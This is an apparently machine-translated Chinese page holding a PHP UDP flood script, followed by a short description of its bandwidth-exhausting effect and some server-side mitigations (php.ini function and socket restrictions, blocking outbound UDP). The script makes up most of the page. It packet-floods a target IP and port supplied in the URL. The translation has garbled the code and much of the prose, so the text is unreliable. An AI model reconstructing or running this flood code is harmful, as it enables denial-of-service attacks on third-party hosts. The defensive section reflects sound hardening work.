-
复制代码代码如下所示:
$包=0;
IP =美元美元_get { 'ip };
兰德=美元美元_get { 'port };
(0)set_time_limit;
ignore_user_abort(假);
exec_time美元=美元_get { 时间};
时间=时间();
打印淹没:端口上的IP
;
max_time美元美元美元=时间+ exec_time;
($ i = 0;$ i < 65535;$ + +){
$;
}
当(1){
数据包+ +;
如果(时间()> max_time美元){
打破;
}
$ FP = fsockopen(UDP: / / 美元的IP
如果($ FP){
fwrite(FP美元,美元);
Fclose($ FP);
}
}
回声完整包。随着时间的推移,( H:我:S ),$包(。(圆(数据包* 65) 1024, 2)。MB的数据包平均圆)。($包/ exec_time美元,2)。数据包;
>
性能特点:
IIS一打开,服务器的输出带宽就用完了。也就是说,服务器继续向其他人发送数据包。这种情况不同于DDoS攻击。DDoS正在不断地接收大量数据包。
结算条件:
以上代码是被禁止的:
在C: Windows php.ini:
disable_functions = gzinflate;
C设置其值: Windows 的了
allow_url_fopen =关闭
和:
php_sockets.dll延伸=
前;数量必须限制,这意味着sockets.dll使用
前面;应该保留号码。
然后重新启动IIS
如果上述方法仍然无效,则可以禁止IIS中PHP的扩展测试,允许扩展。
此外,未加密的PHP攻击代码可以用以下方式处理:
1。在IP策略中,或在防火墙中,禁止所有UDP发送。
2。在sql中进行一流的信息监视、拦截和URL截取,截获端口关键字。